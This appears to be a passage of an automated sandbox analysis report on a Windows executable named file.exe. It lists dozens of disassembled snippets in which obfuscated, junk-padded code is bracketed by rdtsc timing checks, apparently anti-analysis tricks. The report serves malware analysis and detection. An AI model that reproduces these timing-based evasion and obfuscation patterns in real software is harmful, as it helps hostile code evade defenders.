                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6E82 second address: 10F6EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007FFAC1684456h 0x00000010 jmp 00007FFAC1684465h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAC1684460h 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7DE1 second address: 10F7DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F8EAE second address: 10F8EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6EC8 second address: 10F6ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F9E97 second address: 10F9EA5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAC1684456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103425 second address: 1103429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103850 second address: 1103856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103856 second address: 110385A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B598 second address: 110B5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B5A3 second address: 110B5BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007FFAC0BDB474h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B5BC second address: 110B5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110C9FE second address: 110CA1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CA1A second address: 110CA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CA1E second address: 110CA24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111112A second address: 111112E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111286 second address: 11112B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB472h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAC0BDB478h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11112B8 second address: 11112D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684463h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11112D3 second address: 11112D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111413 second address: 1111423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FFAC1684456h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11116F9 second address: 11116FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11116FD second address: 1111703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111703 second address: 1111736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB472h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FFAC0BDB482h 0x0000000f pushad 0x00000010 jmp 00007FFAC0BDB46Ah 0x00000015 jmp 00007FFAC0BDB46Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111A0D second address: 1111A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111B86 second address: 1111B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111D3A second address: 1111D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9343 second address: 10A937A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAC0BDB480h 0x00000008 jmp 00007FFAC0BDB478h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnp 00007FFAC0BDB468h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jnc 00007FFAC0BDB466h 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A937A second address: 10A9389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jl 00007FFAC1684456h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11166F3 second address: 1116703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC0BDB46Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116703 second address: 1116712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116B29 second address: 1116B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116B2D second address: 1116B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FFAC168445Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116C86 second address: 1116CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB475h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FFAC0BDB466h 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11170D3 second address: 11170D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11170D8 second address: 1117107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC0BDB476h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FFAC0BDB46Eh 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117107 second address: 111710B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117851 second address: 1117857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AA15 second address: 111AA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EBD8 second address: 111EBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB479h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA943 second address: 10EA9C5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAC168445Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FFAC1684458h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 add edi, dword ptr [ebp+122D1FB1h] 0x0000002b call 00007FFAC1684467h 0x00000030 movsx ecx, cx 0x00000033 pop edi 0x00000034 lea eax, dword ptr [ebp+1248F666h] 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FFAC1684458h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 nop 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 push esi 0x00000059 pop esi 0x0000005a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA9C5 second address: 10EA9D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAC0BDB46Ch 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA9D9 second address: 10C84EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 nop 0x00000012 sub dword ptr [ebp+1248C04Ah], ebx 0x00000018 call dword ptr [ebp+122D3CB7h] 0x0000001e jc 00007FFAC1684483h 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007FFAC1684456h 0x0000002c jo 00007FFAC1684456h 0x00000032 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAA9C second address: 10EAAA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAAA1 second address: 10EAB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov edi, dword ptr [ebp+122D3009h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+122D2DC9h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov dword ptr [ebp+124695D9h], ecx 0x0000002a mov dword ptr [ebp+1248F6BEh], esp 0x00000030 mov ch, 84h 0x00000032 cmp dword ptr [ebp+122D3079h], 00000000h 0x00000039 jne 00007FFAC1684541h 0x0000003f push 00000000h 0x00000041 push ecx 0x00000042 call 00007FFAC1684458h 0x00000047 pop ecx 0x00000048 mov dword ptr [esp+04h], ecx 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ecx 0x00000055 push ecx 0x00000056 ret 0x00000057 pop ecx 0x00000058 ret 0x00000059 movsx edx, bx 0x0000005c mov edi, dword ptr [ebp+1247D56Bh] 0x00000062 mov byte ptr [ebp+122D1F8Ah], 00000047h 0x00000069 mov dword ptr [ebp+122D29F9h], esi 0x0000006f mov eax, D49AA7D2h 0x00000074 sub dword ptr [ebp+122D29EAh], eax 0x0000007a push eax 0x0000007b pushad 0x0000007c je 00007FFAC1684458h 0x00000082 pushad 0x00000083 popad 0x00000084 push eax 0x00000085 push edx 0x00000086 pushad 0x00000087 popad 0x00000088 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAB2F second address: 10EAB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAF4D second address: 10EAF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAF51 second address: 10EAF55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAF55 second address: 10EAF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EAF5B second address: 10EAF65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFAC0BDB466h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB0DA second address: 10EB0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB0E0 second address: 10EB0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], esi 0x00000009 mov edx, 7B92C9F3h 0x0000000e adc cx, 90A2h 0x00000013 nop 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FFAC0BDB466h 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB405 second address: 10EB409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB409 second address: 10EB40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB40F second address: 10EB44F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAC1684466h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e or dx, C38Ah 0x00000013 push 00000004h 0x00000015 movzx edx, ax 0x00000018 push eax 0x00000019 jc 00007FFAC168446Bh 0x0000001f pushad 0x00000020 jmp 00007FFAC168445Dh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB9DE second address: 10EB9F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB471h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB9F3 second address: 10EBA17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAC1684464h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBA17 second address: 10EBA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB4E second address: 10EBB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FFAC1684466h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FFAC1684460h 0x00000015 jmp 00007FFAC168445Ah 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jne 00007FFAC1684456h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB8B second address: 10EBB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB90 second address: 10EBBAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC1684465h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBCBC second address: 10EBCF8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAC0BDB47Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FFAC0BDB477h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBCF8 second address: 10EBCFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EED9 second address: 111EEF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAC0BDB472h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F2EE second address: 111F2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F5B7 second address: 111F5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F6EC second address: 111F6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F6F1 second address: 111F722 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAC0BDB472h 0x00000008 pushad 0x00000009 jmp 00007FFAC0BDB478h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F880 second address: 111F88C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAC1684456h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128A50 second address: 1128A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128A58 second address: 1128A65 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128A65 second address: 1128A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128A6B second address: 1128A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127751 second address: 112776F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jng 00007FFAC0BDB466h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112776F second address: 1127775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127775 second address: 1127779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127E68 second address: 1127E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127E6C second address: 1127E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFAC0BDB46Ch 0x0000000c jnl 00007FFAC0BDB466h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007FFAC0BDB472h 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11273F9 second address: 112742C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FFAC1684468h 0x0000000f jnc 00007FFAC1684456h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a jnp 00007FFAC1684456h 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112742C second address: 112744B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFAC0BDB479h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112816B second address: 112817B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFAC1684456h 0x0000000a jng 00007FFAC1684456h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112817B second address: 112818C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FFAC0BDB466h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112818C second address: 11281B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FFAC168445Ah 0x0000000f pushad 0x00000010 jmp 00007FFAC168445Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11281B1 second address: 11281B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112830E second address: 1128312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128312 second address: 112832C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB474h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112C16E second address: 112C175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E941 second address: 112E947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E947 second address: 112E995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FFAC1684458h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FFAC1684468h 0x00000015 jmp 00007FFAC1684466h 0x0000001a jmp 00007FFAC168445Fh 0x0000001f popad 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113538D second address: 11353C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FFAC0BDB476h 0x0000000c jmp 00007FFAC0BDB475h 0x00000011 push eax 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11346B1 second address: 11346C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFAC1684466h 0x0000000a jmp 00007FFAC168445Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
